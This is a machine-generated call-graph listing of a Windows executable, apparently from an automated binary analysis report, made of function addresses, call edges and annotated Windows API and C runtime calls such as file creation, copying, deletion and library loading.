bc9d3c 60 API calls 104621->104623 104690 bc8d40 59 API calls Mailbox 104621->104690 104692 c3d649 108 API calls _free 104621->104692 104623->104621 104625 bc984b 104624->104625 104626 bc9851 104624->104626 104625->104611 104642 c3d7a5 104625->104642 104627 bff5d3 __i64tow 104626->104627 104628 bc9899 104626->104628 104632 bc9857 __itow 104626->104632 104633 bff4da 104626->104633 104693 be3698 84 API calls 3 library calls 104628->104693 104631 be0db6 Mailbox 59 API calls 104634 bc9871 104631->104634 104632->104631 104635 bff552 Mailbox _wcscpy 104633->104635 104636 be0db6 Mailbox 59 API calls 104633->104636 104634->104625 104637 bc7de1 59 API calls 104634->104637 104694 be3698 84 API calls 3 library calls 104635->104694 104638 bff51f 104636->104638 104637->104625 104639 be0db6 Mailbox 59 API calls 104638->104639 104640 bff545 104639->104640 104640->104635 104641 bc7de1 59 API calls 104640->104641 104641->104635 104643 bc7e4f 59 API calls 104642->104643 104644 c3d7c0 CharLowerBuffW 104643->104644 104695 c1f167 104644->104695 104648 bc7667 59 API calls 104649 c3d7f9 104648->104649 104702 bc784b 104649->104702 104651 c3d810 104652 bc7d2c 59 API calls 104651->104652 104653 c3d81c Mailbox 104652->104653 104654 c3d858 Mailbox 104653->104654 104715 c3cfdf 61 API calls 2 library calls 104653->104715 104654->104614 104656 c3c989 104655->104656 104657 c3c9de 104655->104657 104658 be0db6 Mailbox 59 API calls 104656->104658 104661 c3da50 104657->104661 104660 c3c9ab 104658->104660 104659 be0db6 Mailbox 59 API calls 104659->104660 104660->104657 104660->104659 104662 c3dc79 Mailbox 104661->104662 104669 c3da73 _strcat _wcscpy __wsetenvp 104661->104669 104662->104602 104663 bc9be6 59 API calls 104663->104669 104664 bc9b3c 59 API calls 104664->104669 104665 bc9b98 59 API calls 104665->104669 104666 be571c 58 API calls __crtGetStringTypeA_stat 104666->104669 104667 bc9837 85 API calls 104667->104669 104669->104662 104669->104663 104669->104664 104669->104665 104669->104666 104669->104667 104719 c25887 61 API calls 2 library calls 104669->104719 104671 be0c1d 104670->104671 104672 be0cb5 VirtualProtect 104671->104672 104673 be0c83 104671->104673 104672->104673 104673->104605 104673->104606 104674->104614 104675->104614 104676->104609 104678 bc92d6 104677->104678 104679 be0db6 Mailbox 59 API calls 104678->104679 104680 bc92e4 104679->104680 104681 bc92f0 104680->104681 104720 bc91fc 59 API calls Mailbox 104680->104720 104683 bc9050 104681->104683 104721 bc9160 104683->104721 104685 bc905f 104686 be0db6 Mailbox 59 API calls 104685->104686 104687 bc90fb 104685->104687 104686->104687 104687->104621 104688 bc8d40 59 API calls Mailbox 104687->104688 104688->104617 104689->104621 104690->104621 104691->104594 104692->104621 104693->104632 104694->104627 104696 c1f192 __wsetenvp 104695->104696 104697 c1f1d1 104696->104697 104700 c1f1c7 104696->104700 104701 c1f278 104696->104701 104697->104648 104697->104653 104700->104697 104716 bc78c4 61 API calls 104700->104716 104701->104697 104717 bc78c4 61 API calls 104701->104717 104703 bc785a 104702->104703 104704 bc78b7 104702->104704 104703->104704 104706 bc7865 104703->104706 104705 bc7d2c 59 API calls 104704->104705 104711 bc7888 _memmove 104705->104711 104707 bfeb09 104706->104707 104708 bc7880 104706->104708 104710 bc8029 59 API calls 104707->104710 104718 bc7f27 59 API calls Mailbox 104708->104718 104712 bfeb13 104710->104712 104711->104651 104713 be0db6 Mailbox 59 API calls 104712->104713 104714 bfeb33 104713->104714 104715->104654 104716->104700 104717->104701 104718->104711 104719->104669 104720->104681 104722 bc9169 Mailbox 104721->104722 104723 bff19f 104722->104723 104728 bc9173 104722->104728 104724 be0db6 Mailbox 59 API calls 104723->104724 104726 bff1ab 104724->104726 104725 bc917a 104725->104685 104727 bc9c90 Mailbox 59 API calls 104727->104728 104728->104725 104728->104727 104729->104495 104730->104495 104732 bfec6b 104731->104732 104733 bc7b40 104731->104733 104747 c17bdb 59 API calls _memmove 104732->104747 104741 bc7a51 104733->104741 104736 bc7b4c 104736->104473 104737 bfec75 104738 bc8047 59 API calls 104737->104738 104739 bfec7d Mailbox 104738->104739 104740->104474 104742 bc7a5f 104741->104742 104743 bc7a85 _memmove 104741->104743 104742->104743 104744 be0db6 Mailbox 59 API calls 104742->104744 104743->104736 104743->104743 104745 bc7ad4 104744->104745 104746 be0db6 Mailbox 59 API calls 104745->104746 104746->104743 104747->104737 104748->104535 104749->104507 104750->104520 104752 bcf4ba 104751->104752 104753 bcf650 104751->104753 104755 bcf4c6 104752->104755 104756 c0441e 104752->104756 104754 bc7de1 59 API calls 104753->104754 104762 bcf58c Mailbox 104754->104762 104957 bcf290 342 API calls 2 library calls 104755->104957 104757 c3bc6b 342 API calls 104756->104757 104759 c0442c 104757->104759 104763 bcf630 104759->104763 104958 c29e4a 90 API calls 4 library calls 104759->104958 104761 bcf4fd 104761->104759 104761->104762 104761->104763 104856 c2cb7a 104762->104856 104936 bc4e4a 104762->104936 104942 c23c37 104762->104942 104945 c3df37 104762->104945 104948 c3445a 104762->104948 104763->104535 104764 bc9c90 Mailbox 59 API calls 104765 bcf5e3 104764->104765 104765->104763 104765->104764 104771->104518 104772->104524 105808 bc8180 104773->105808 104775 bcfd3d 104777 c0472d 104775->104777 104838 bd06f6 104775->104838 105813 bcf234 104775->105813 105915 c29e4a 90 API calls 4 library calls 104777->105915 104780 c0488d 104785 bcfe4c 104780->104785 104837 c04742 104780->104837 105921 c3a2d9 86 API calls Mailbox 104780->105921 104781 bcfe3e 104781->104780 104781->104785 105919 c166ec 59 API calls 2 library calls 104781->105919 104782 c04b53 104782->104837 105940 c29e4a 90 API calls 4 library calls 104782->105940 104783 bd0517 104792 be0db6 Mailbox 59 API calls 104783->104792 104784 be0db6 59 API calls Mailbox 104815 bcfdd3 104784->104815 104785->104782 104793 c048f9 104785->104793 105817 bc837c 104785->105817 104786 c047d7 104786->104837 105917 c29e4a 90 API calls 4 library calls 104786->105917 104789 c04848 105920 c160ef 59 API calls 2 library calls 104789->105920 104801 bd0545 _memmove 104792->104801 104802 c04917 104793->104802 105923 bc85c0 104793->105923 104795 c04755 104795->104786 105916 bcf6a3 342 API calls 104795->105916 104798 c0486b 104804 bc9ea0 342 API calls 104798->104804 104799 c048b2 Mailbox 104799->104785 105922 c166ec 59 API calls 2 library calls 104799->105922 104809 be0db6 Mailbox 59 API calls 104801->104809 104806 c04928 104802->104806 104811 bc85c0 59 API calls 104802->104811 104803 bcfea4 104807 c04ad6 104803->104807 104808 bcff32 104803->104808 104829 bd0179 Mailbox _memmove 104803->104829 104804->104780 104806->104829 105931 c160ab 59 API calls Mailbox 104806->105931 105939 c29ae7 60 API calls 104807->105939 104812 be0db6 Mailbox 59 API calls 104808->104812 104832 bd0106 _memmove 104809->104832 104811->104806 104816 bcff39 104812->104816 104815->104781 104815->104783 104815->104784 104815->104795 104815->104801 104817 bc9ea0 342 API calls 104815->104817 104824 c0480c 104815->104824 104815->104837 104816->104838 105824 bd09d0 104816->105824 104817->104815 104818 bc9ea0 342 API calls 104821 c04a87 104818->104821 104819 bcffe6 104831 bd0007 104819->104831 104833 bc8047 59 API calls 104819->104833 104821->104837 105934 bc84c0 104821->105934 104823 bcffb2 104823->104801 104823->104819 104823->104838 105918 c29e4a 90 API calls 4 library calls 104824->105918 104828 c04ab2 105938 c29e4a 90 API calls 4 library calls 104828->105938 104829->104828 104836 bc9d3c 60 API calls 104829->104836 104829->104838 104839 bd0398 104829->104839 104840 be0db6 59 API calls Mailbox 104829->104840 104846 c04a1c 104829->104846 104851 c04a4d 104829->104851 105912 bc8740 68 API calls __cinit 104829->105912 105913 bc8660 68 API calls 104829->105913 105932 c25937 68 API calls 104829->105932 105933 bc89b3 69 API calls Mailbox 104829->105933 104831->104838 104841 c04b24 104831->104841 104843 bd004c 104831->104843 104832->104829 104835 bc9c90 Mailbox 59 API calls 104832->104835 104852 bd0162 104832->104852 104833->104831 104835->104832 104836->104829 105914 c29e4a 90 API calls 4 library calls 104838->105914 104839->104535 104840->104829 104842 bc9d3c 60 API calls 104841->104842 104842->104782 104843->104782 104843->104838 104844 bd00d8 104843->104844 104845 bc9d3c 60 API calls 104844->104845 104847 bd00eb 104845->104847 104848 be0db6 Mailbox 59 API calls 104846->104848 104847->104838 105901 bc82df 104847->105901 104848->104851 104851->104818 104852->104535 104853->104533 104854->104536 104855->104540 104857 bc7667 59 API calls 104856->104857 104858 c2cbaf 104857->104858 104859 bc7667 59 API calls 104858->104859 104860 c2cbb8 104859->104860 104861 c2cbcc 104860->104861 105146 bc9b3c 59 API calls 104860->105146 104863 bc9837 85 API calls 104861->104863 104864 c2cbe9 104863->104864 104865 c2ccea 104864->104865 104866 c2cc0b 104864->104866 104871 c2cd1a Mailbox 104864->104871 104959 bc4ddd 104865->104959 104867 bc9837 85 API calls 104866->104867 104869 c2cc17 104867->104869 104872 bc8047 59 API calls 104869->104872 104871->104765 104878 c2cc23 104872->104878 104873 c2cd16 104873->104871 104875 bc7667 59 API calls 104873->104875 104874 bc4ddd 136 API calls 104874->104873 104876 c2cd4b 104875->104876 104877 bc7667 59 API calls 104876->104877 104879 c2cd54 104877->104879 104880 c2cc37 104878->104880 104881 c2cc69 104878->104881 104883 bc7667 59 API calls 104879->104883 104884 bc8047 59 API calls 104880->104884 104882 bc9837 85 API calls 104881->104882 104885 c2cc76 104882->104885 104886 c2cd5d 104883->104886 104887 c2cc47 104884->104887 104888 bc8047 59 API calls 104885->104888 104889 bc7667 59 API calls 104886->104889 104890 bc7cab 59 API calls 104887->104890 104891 c2cc82 104888->104891 104892 c2cd66 104889->104892 104893 c2cc51 104890->104893 105147 c24a31 GetFileAttributesW 104891->105147 104895 bc9837 85 API calls 104892->104895 104896 bc9837 85 API calls 104893->104896 104898 c2cd73 104895->104898 104899 c2cc5d 104896->104899 104897 c2cc8b 104900 c2cc9e 104897->104900 104903 bc79f2 59 API calls 104897->104903 104983 bc459b 104898->104983 104902 bc7b2e 59 API calls 104899->104902 104905 bc9837 85 API calls 104900->104905 104910 c2cca4 104900->104910 104902->104881 104903->104900 104904 c2cd8e 105034 bc79f2 104904->105034 104907 c2cccb 104905->104907 105148 c237ef 75 API calls Mailbox 104907->105148 104910->104871 104911 c2cdd1 104912 bc8047 59 API calls 104911->104912 104914 c2cddf 104912->104914 104913 bc79f2 59 API calls 104915 c2cdae 104913->104915 104916 bc7b2e 59 API calls 104914->104916 104915->104911 104917 bc7bcc 59 API calls 104915->104917 104918 c2cded 104916->104918 104919 c2cdc3 104917->104919 104920 bc7b2e 59 API calls 104918->104920 104921 bc7bcc 59 API calls 104919->104921 104922 c2cdfb 104920->104922 104921->104911 104923 bc7b2e 59 API calls 104922->104923 104924 c2ce09 104923->104924 104925 bc9837 85 API calls 104924->104925 104926 c2ce15 104925->104926 105037 c24071 104926->105037 104928 c2ce26 104929 c23c37 3 API calls 104928->104929 104930 c2ce30 104929->104930 104931 bc9837 85 API calls 104930->104931 104935 c2ce61 104930->104935 104932 c2ce4e 104931->104932 105091 c29155 104932->105091 104934 bc4e4a 84 API calls 104934->104871 104935->104934 104937 bc4e54 104936->104937 104941 bc4e5b 104936->104941 104938 be53a6 __fcloseall 83 API calls 104937->104938 104938->104941 104939 bc4e6a 104939->104765 104940 bc4e7b FreeLibrary 104940->104939 104941->104939 104941->104940 105759 c2445a GetFileAttributesW 104942->105759 104946 c3cadd 131 API calls 104945->104946 104947 c3df47 104946->104947 104947->104765 104949 bc9837 85 API calls 104948->104949 104950 c34494 104949->104950 105763 bc6240 104950->105763 104952 c344a4 104953 c344c9 104952->104953 104954 bc9ea0 342 API calls 104952->104954 104956 c344cd 104953->104956 105788 bc9a98 59 API calls Mailbox 104953->105788 104954->104953 104956->104765 104957->104761 104958->104763 105149 bc4bb5 104959->105149 104964 bc4e08 LoadLibraryExW 105159 bc4b6a 104964->105159 104965 bfd8e6 104966 bc4e4a 84 API calls 104965->104966 104968 bfd8ed 104966->104968 104970 bc4b6a 3 API calls 104968->104970 104972 bfd8f5 104970->104972 105185 bc4f0b 104972->105185 104973 bc4e2f 104973->104972 104974 bc4e3b 104973->104974 104976 bc4e4a 84 API calls 104974->104976 104977 bc4e40 104976->104977 104977->104873 104977->104874 104980 bfd91c 105193 bc4ec7 104980->105193 104984 bc7667 59 API calls 104983->104984 104985 bc45b1 104984->104985 104986 bc7667 59 API calls 104985->104986 104987 bc45b9 104986->104987 104988 bc7667 59 API calls 104987->104988 104989 bc45c1 104988->104989 104990 bc7667 59 API calls 104989->104990 104991 bc45c9 104990->104991 104992 bc45fd 104991->104992 104993 bfd4d2 104991->104993 104994 bc784b 59 API calls 104992->104994 104995 bc8047 59 API calls 104993->104995 104996 bc460b 104994->104996 104997 bfd4db 104995->104997 104998 bc7d2c 59 API calls 104996->104998 104999 bc7d8c 59 API calls 104997->104999 105000 bc4615 104998->105000 105002 bc4640 104999->105002 105001 bc784b 59 API calls 105000->105001 105000->105002 105004 bc4636 105001->105004 105005 bc465f 105002->105005 105014 bfd4fb 105002->105014 105020 bc4680 105002->105020 105003 bc784b 59 API calls 105009 bc4691 105003->105009 105006 bc7d2c 59 API calls 105004->105006 105008 bc79f2 59 API calls 105005->105008 105006->105002 105007 bfd5cb 105010 bc7bcc 59 API calls 105007->105010 105011 bc4669 105008->105011 105012 bc46a3 105009->105012 105015 bc8047 59 API calls 105009->105015 105029 bfd588 105010->105029 105019 bc784b 59 API calls 105011->105019 105011->105020 105013 bc46b3 105012->105013 105016 bc8047 59 API calls 105012->105016 105018 bc46ba 105013->105018 105021 bc8047 59 API calls 105013->105021 105014->105007 105017 bfd5b4 105014->105017 105027 bfd532 105014->105027 105015->105012 105016->105013 105017->105007 105023 bfd59f 105017->105023 105022 bc8047 59 API calls 105018->105022 105031 bc46c1 Mailbox 105018->105031 105019->105020 105020->105003 105021->105018 105022->105031 105026 bc7bcc 59 API calls 105023->105026 105024 bfd590 105025 bc7bcc 59 API calls 105024->105025 105025->105029 105026->105029 105027->105024 105032 bfd57b 105027->105032 105028 bc79f2 59 API calls 105028->105029 105029->105020 105029->105028 105444 bc7924 59 API calls 2 library calls 105029->105444 105031->104904 105033 bc7bcc 59 API calls 105032->105033 105033->105029 105035 bc7e4f 59 API calls 105034->105035 105036 bc79fd 105035->105036 105036->104911 105036->104913 105038 c2408d 105037->105038 105039 c24092 105038->105039 105040 c240a0 105038->105040 105041 bc8047 59 API calls 105039->105041 105042 bc7667 59 API calls 105040->105042 105043 c2409b Mailbox 105041->105043 105044 c240a8 105042->105044 105043->104928 105045 bc7667 59 API calls 105044->105045 105046 c240b0 105045->105046 105047 bc7667 59 API calls 105046->105047 105048 c240bb 105047->105048 105049 bc7667 59 API calls 105048->105049 105050 c240c3 105049->105050 105051 bc7667 59 API calls 105050->105051 105052 c240cb 105051->105052 105053 bc7667 59 API calls 105052->105053 105054 c240d3 105053->105054 105055 bc7667 59 API calls 105054->105055 105056 c240db 105055->105056 105057 bc7667 59 API calls 105056->105057 105058 c240e3 105057->105058 105059 bc459b 59 API calls 105058->105059 105060 c240fa 105059->105060 105061 bc459b 59 API calls 105060->105061 105062 c24113 105061->105062 105063 bc79f2 59 API calls 105062->105063 105064 c2411f 105063->105064 105065 c24132 105064->105065 105066 bc7d2c 59 API calls 105064->105066 105067 bc79f2 59 API calls 105065->105067 105066->105065 105068 c2413b 105067->105068 105069 c2414b 105068->105069 105070 bc7d2c 59 API calls 105068->105070 105071 bc8047 59 API calls 105069->105071 105070->105069 105072 c24157 105071->105072 105073 bc7b2e 59 API calls 105072->105073 105074 c24163 105073->105074 105445 c24223 59 API calls 105074->105445 105076 c24172 105446 c24223 59 API calls 105076->105446 105078 c24185 105079 bc79f2 59 API calls 105078->105079 105080 c2418f 105079->105080 105081 c241a6 105080->105081 105082 c24194 105080->105082 105084 bc79f2 59 API calls 105081->105084 105083 bc7cab 59 API calls 105082->105083 105085 c241a1 105083->105085 105086 c241af 105084->105086 105089 bc7b2e 59 API calls 105085->105089 105087 c241cd 105086->105087 105088 bc7cab 59 API calls 105086->105088 105090 bc7b2e 59 API calls 105087->105090 105088->105085 105089->105087 105090->105043 105092 c29162 __ftell_nolock 105091->105092 105093 be0db6 Mailbox 59 API calls 105092->105093 105094 c291bf 105093->105094 105095 bc522e 59 API calls 105094->105095 105096 c291c9 105095->105096 105097 c28f5f GetSystemTimeAsFileTime 105096->105097 105098 c291d4 105097->105098 105099 bc4ee5 85 API calls 105098->105099 105100 c291e7 _wcscmp 105099->105100 105101 c2920b 105100->105101 105102 c292b8 105100->105102 105477 c29734 105101->105477 105104 c29734 96 API calls 105102->105104 105119 c29284 _wcscat 105104->105119 105107 bc4f0b 74 API calls 105109 c292dd 105107->105109 105108 c292c1 105108->104935 105110 bc4f0b 74 API calls 105109->105110 105112 c292ed 105110->105112 105111 c29239 _wcscat _wcscpy 105484 be40fb 58 API calls __wsplitpath_helper 105111->105484 105113 bc4f0b 74 API calls 105112->105113 105115 c29308 105113->105115 105116 bc4f0b 74 API calls 105115->105116 105117 c29318 105116->105117 105118 bc4f0b 74 API calls 105117->105118 105120 c29333 105118->105120 105119->105107 105119->105108 105121 bc4f0b 74 API calls 105120->105121 105122 c29343 105121->105122 105123 bc4f0b 74 API calls 105122->105123 105124 c29353 105123->105124 105125 bc4f0b 74 API calls 105124->105125 105126 c29363 105125->105126 105447 c298e3 GetTempPathW GetTempFileNameW 105126->105447 105128 c2936f 105129 be525b 115 API calls 105128->105129 105136 c29380 105129->105136 105131 c29445 105133 c2944b DeleteFileW 105131->105133 105134 c2945f 105131->105134 105132 bc4f0b 74 API calls 105132->105136 105133->105108 105135 c29505 CopyFileW 105134->105135 105140 c29469 _wcsncpy 105134->105140 105137 c2951b DeleteFileW 105135->105137 105138 c2952d DeleteFileW 105135->105138 105136->105108 105136->105132 105144 c2943a 105136->105144 105448 be4863 105136->105448 105137->105108 105474 c298a2 CreateFileW 105138->105474 105485 c28b06 116 API calls __fcloseall 105140->105485 105143 c294f0 105143->105138 105145 c294f4 DeleteFileW 105143->105145 105461 be53a6 105144->105461 105145->105108 105146->104861 105147->104897 105148->104910 105198 bc4c03 105149->105198 105152 bc4bec FreeLibrary 105153 bc4bf5 105152->105153 105156 be525b 105153->105156 105154 bc4c03 2 API calls 105155 bc4bdc 105154->105155 105155->105152 105155->105153 105202 be5270 105156->105202 105158 bc4dfc 105158->104964 105158->104965 105362 bc4c36 105159->105362 105162 bc4c36 2 API calls 105165 bc4b8f 105162->105165 105163 bc4baa 105166 bc4c70 105163->105166 105164 bc4ba1 FreeLibrary 105164->105163 105165->105163 105165->105164 105167 be0db6 Mailbox 59 API calls 105166->105167 105168 bc4c85 105167->105168 105169 bc522e 59 API calls 105168->105169 105170 bc4c91 _memmove 105169->105170 105171 bc4ccc 105170->105171 105172 bc4d89 105170->105172 105173 bc4dc1 105170->105173 105174 bc4ec7 69 API calls 105171->105174 105366 bc4e89 CreateStreamOnHGlobal 105172->105366 105377 c2991b 95 API calls 105173->105377 105178 bc4cd5 105174->105178 105177 bc4f0b 74 API calls 105177->105178 105178->105177 105179 bc4d69 105178->105179 105181 bfd8a7 105178->105181 105372 bc4ee5 105178->105372 105179->104973 105182 bc4ee5 85 API calls 105181->105182 105183 bfd8bb 105182->105183 105184 bc4f0b 74 API calls 105183->105184 105184->105179 105186 bc4f1d 105185->105186 105187 bfd9cd 105185->105187 105401 be55e2 105186->105401 105190 c29109 105421 c28f5f 105190->105421 105192 c2911f 105192->104980 105194 bc4ed6 105193->105194 105195 bfd990 105193->105195 105426 be5c60 105194->105426 105197 bc4ede 105199 bc4bd0 105198->105199 105200 bc4c0c LoadLibraryA 105198->105200 105199->105154 105199->105155 105200->105199 105201 bc4c1d GetProcAddress 105200->105201 105201->105199 105205 be527c __lseeki64 105202->105205 105203 be528f 105251 be8b28 58 API calls __getptd_noexit 105203->105251 105205->105203 105207 be52c0 105205->105207 105206 be5294 105252 be8db6 9 API calls __wcsnicmp_l 105206->105252 105221 bf04e8 105207->105221 105210 be52c5 105211 be52ce 105210->105211 105212 be52db 105210->105212 105253 be8b28 58 API calls __getptd_noexit 105211->105253 105214 be5305 105212->105214 105215 be52e5 105212->105215 105236 bf0607 105214->105236 105254 be8b28 58 API calls __getptd_noexit 105215->105254 105217 be529f __lseeki64 @_EH4_CallFilterFunc@8 105217->105158 105222 bf04f4 __lseeki64 105221->105222 105223 be9c0b __lock 58 API calls 105222->105223 105234 bf0502 105223->105234 105224 bf0576 105256 bf05fe 105224->105256 105225 bf057d 105261 be881d 58 API calls 2 library calls 105225->105261 105228 bf0584 105228->105224 105262 be9e2b InitializeCriticalSectionAndSpinCount 105228->105262 105229 bf05f3 __lseeki64 105229->105210 105231 be9c93 __mtinitlocknum 58 API calls 105231->105234 105233 bf05aa EnterCriticalSection 105233->105224 105234->105224 105234->105225 105234->105231 105259 be6c50 59 API calls __lock 105234->105259 105260 be6cba LeaveCriticalSection LeaveCriticalSection _doexit 105234->105260 105245 bf0627 __wopenfile 105236->105245 105237 bf0641 105267 be8b28 58 API calls __getptd_noexit 105237->105267 105238 bf07fc 105238->105237 105242 bf085f 105238->105242 105240 bf0646 105268 be8db6 9 API calls __wcsnicmp_l 105240->105268 105264 bf85a1 105242->105264 105243 be5310 105255 be5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105243->105255 105245->105237 105245->105238 105269 be37cb 60 API calls __wcsnicmp_l 105245->105269 105247 bf07f5 105247->105238 105270 be37cb 60 API calls __wcsnicmp_l 105247->105270 105249 bf0814 105249->105238 105271 be37cb 60 API calls __wcsnicmp_l 105249->105271 105251->105206 105252->105217 105253->105217 105254->105217 105255->105217 105263 be9d75 LeaveCriticalSection 105256->105263 105258 bf0605 105258->105229 105259->105234 105260->105234 105261->105228 105262->105233 105263->105258 105272 bf7d85 105264->105272 105266 bf85ba 105266->105243 105267->105240 105268->105243 105269->105247 105270->105249 105271->105238 105275 bf7d91 __lseeki64 105272->105275 105273 bf7da7 105359 be8b28 58 API calls __getptd_noexit 105273->105359 105275->105273 105277 bf7ddd 105275->105277 105276 bf7dac 105360 be8db6 9 API calls __wcsnicmp_l 105276->105360 105283 bf7e4e 105277->105283 105280 bf7df9 105361 bf7e22 LeaveCriticalSection __unlock_fhandle 105280->105361 105282 bf7db6 __lseeki64 105282->105266 105284 bf7e6e 105283->105284 105285 be44ea __wsopen_nolock 58 API calls 105284->105285 105289 bf7e8a 105285->105289 105286 bf7fc1 105287 be8dc6 __invoke_watson 8 API calls 105286->105287 105288 bf85a0 105287->105288 105291 bf7d85 __wsopen_helper 103 API calls 105288->105291 105289->105286 105290 bf7ec4 105289->105290 105297 bf7ee7 105289->105297 105292 be8af4 __lseeki64 58 API calls 105290->105292 105293 bf85ba 105291->105293 105294 bf7ec9 105292->105294 105293->105280 105295 be8b28 __wcsnicmp_l 58 API calls 105294->105295 105296 bf7ed6 105295->105296 105299 be8db6 __wcsnicmp_l 9 API calls 105296->105299 105298 bf7fa5 105297->105298 105305 bf7f83 105297->105305 105300 be8af4 __lseeki64 58 API calls 105298->105300 105301 bf7ee0 105299->105301 105302 bf7faa 105300->105302 105301->105280 105303 be8b28 __wcsnicmp_l 58 API calls 105302->105303 105304 bf7fb7 105303->105304 105306 be8db6 __wcsnicmp_l 9 API calls 105304->105306 105307 bed294 __alloc_osfhnd 61 API calls 105305->105307 105306->105286 105308 bf8051 105307->105308 105309 bf807e 105308->105309 105310 bf805b 105308->105310 105311 bf7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105309->105311 105312 be8af4 __lseeki64 58 API calls 105310->105312 105321 bf80a0 105311->105321 105313 bf8060 105312->105313 105315 be8b28 __wcsnicmp_l 58 API calls 105313->105315 105314 bf811e GetFileType 105318 bf816b 105314->105318 105319 bf8129 GetLastError 105314->105319 105317 bf806a 105315->105317 105316 bf80ec GetLastError 105322 be8b07 __dosmaperr 58 API calls 105316->105322 105323 be8b28 __wcsnicmp_l 58 API calls 105317->105323 105329 bed52a __set_osfhnd 59 API calls 105318->105329 105320 be8b07 __dosmaperr 58 API calls 105319->105320 105324 bf8150 CloseHandle 105320->105324 105321->105314 105321->105316 105325 bf7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105321->105325 105326 bf8111 105322->105326 105323->105301 105324->105326 105327 bf815e 105324->105327 105328 bf80e1 105325->105328 105332 be8b28 __wcsnicmp_l 58 API calls 105326->105332 105330 be8b28 __wcsnicmp_l 58 API calls 105327->105330 105328->105314 105328->105316 105331 bf8189 105329->105331 105333 bf8163 105330->105333 105334 bf8344 105331->105334 105335 bf18c1 __lseeki64_nolock 60 API calls 105331->105335 105350 bf820a 105331->105350 105332->105286 105333->105326 105334->105286 105337 bf8517 CloseHandle 105334->105337 105336 bf81f3 105335->105336 105340 be8af4 __lseeki64 58 API calls 105336->105340 105355 bf8212 105336->105355 105338 bf7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105337->105338 105339 bf853e 105338->105339 105342 bf83ce 105339->105342 105343 bf8546 GetLastError 105339->105343 105340->105350 105341 bf0e5b 70 API calls __read_nolock 105341->105355 105342->105286 105344 be8b07 __dosmaperr 58 API calls 105343->105344 105345 bf8552 105344->105345 105347 bed43d __free_osfhnd 59 API calls 105345->105347 105346 bf0add __close_nolock 61 API calls 105346->105355 105347->105342 105348 bf97a2 __chsize_nolock 82 API calls 105348->105355 105349 bed886 __write 78 API calls 105349->105350 105350->105334 105350->105349 105352 bf18c1 60 API calls __lseeki64_nolock 105350->105352 105350->105355 105351 bf83c1 105354 bf0add __close_nolock 61 API calls 105351->105354 105352->105350 105353 bf83aa 105353->105334 105357 bf83c8 105354->105357 105355->105341 105355->105346 105355->105348 105355->105350 105355->105351 105355->105353 105356 bf18c1 60 API calls __lseeki64_nolock 105355->105356 105356->105355 105358 be8b28 __wcsnicmp_l 58 API calls 105357->105358 105358->105342 105359->105276 105360->105282 105361->105282 105363 bc4b83 105362->105363 105364 bc4c3f LoadLibraryA 105362->105364 105363->105162 105363->105165 105364->105363 105365 bc4c50 GetProcAddress 105364->105365 105365->105363 105367 bc4ea3 FindResourceExW 105366->105367 105371 bc4ec0 105366->105371 105368 bfd933 LoadResource 105367->105368 105367->105371 105369 bfd948 SizeofResource 105368->105369 105368->105371 105370 bfd95c LockResource 105369->105370 105369->105371 105370->105371 105371->105171 105373 bfd9ab 105372->105373 105374 bc4ef4 105372->105374 105378 be584d 105374->105378 105376 bc4f02 105376->105178 105377->105171 105380 be5859 __lseeki64 105378->105380 105379 be586b 105391 be8b28 58 API calls __getptd_noexit 105379->105391 105380->105379 105381 be5891 105380->105381 105393 be6c11 105381->105393 105384 be5870 105392 be8db6 9 API calls __wcsnicmp_l 105384->105392 105388 be58a6 105400 be58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105388->105400 105390 be587b __lseeki64 105390->105376 105391->105384 105392->105390 105394 be6c43 EnterCriticalSection 105393->105394 105395 be6c21 105393->105395 105397 be5897 105394->105397 105395->105394 105396 be6c29 105395->105396 105398 be9c0b __lock 58 API calls 105396->105398 105399 be57be 83 API calls 5 library calls 105397->105399 105398->105397 105399->105388 105400->105390 105404 be55fd 105401->105404 105403 bc4f2e 105403->105190 105405 be5609 __lseeki64 105404->105405 105406 be561f _memset 105405->105406 105407 be564c 105405->105407 105409 be5644 __lseeki64 105405->105409 105417 be8b28 58 API calls __getptd_noexit 105406->105417 105408 be6c11 __lock_file 59 API calls 105407->105408 105410 be5652 105408->105410 105409->105403 105419 be541d 72 API calls 6 library calls 105410->105419 105413 be5639 105418 be8db6 9 API calls __wcsnicmp_l 105413->105418 105414 be5668 105420 be5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105414->105420 105417->105413 105418->105409 105419->105414 105420->105409 105424 be520a GetSystemTimeAsFileTime 105421->105424 105423 c28f6e 105423->105192 105425 be5238 __aulldiv 105424->105425 105425->105423 105427 be5c6c __lseeki64 105426->105427 105428 be5c7e 105427->105428 105429 be5c93 105427->105429 105440 be8b28 58 API calls __getptd_noexit 105428->105440 105431 be6c11 __lock_file 59 API calls 105429->105431 105433 be5c99 105431->105433 105432 be5c83 105441 be8db6 9 API calls __wcsnicmp_l 105432->105441 105442 be58d0 67 API calls 6 library calls 105433->105442 105436 be5ca4 105443 be5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105436->105443 105438 be5cb6 105439 be5c8e __lseeki64 105438->105439 105439->105197 105440->105432 105441->105439 105442->105436 105443->105438 105444->105029 105445->105076 105446->105078 105447->105128 105449 be486f __lseeki64 105448->105449 105450 be488d 105449->105450 105451 be48a5 105449->105451 105453 be489d __lseeki64 105449->105453 105498 be8b28 58 API calls __getptd_noexit 105450->105498 105454 be6c11 __lock_file 59 API calls 105451->105454 105453->105136 105456 be48ab 105454->105456 105455 be4892 105499 be8db6 9 API calls __wcsnicmp_l 105455->105499 105486 be470a 105456->105486 105462 be53b2 __lseeki64 105461->105462 105463 be53de 105462->105463 105464 be53c6 105462->105464 105467 be6c11 __lock_file 59 API calls 105463->105467 105470 be53d6 __lseeki64 105463->105470 105681 be8b28 58 API calls __getptd_noexit 105464->105681 105466 be53cb 105682 be8db6 9 API calls __wcsnicmp_l 105466->105682 105469 be53f0 105467->105469 105665 be533a 105469->105665 105470->105131 105475 c298c8 SetFileTime CloseHandle 105474->105475 105476 c298de 105474->105476 105475->105476 105476->105108 105479 c29748 __tzset_nolock _wcscmp 105477->105479 105478 c29109 GetSystemTimeAsFileTime 105478->105479 105479->105478 105480 bc4f0b 74 API calls 105479->105480 105481 c29210 105479->105481 105482 bc4ee5 85 API calls 105479->105482 105480->105479 105481->105108 105483 be40fb 58 API calls __wsplitpath_helper 105481->105483 105482->105479 105483->105111 105484->105119 105485->105143 105489 be4719 105486->105489 105492 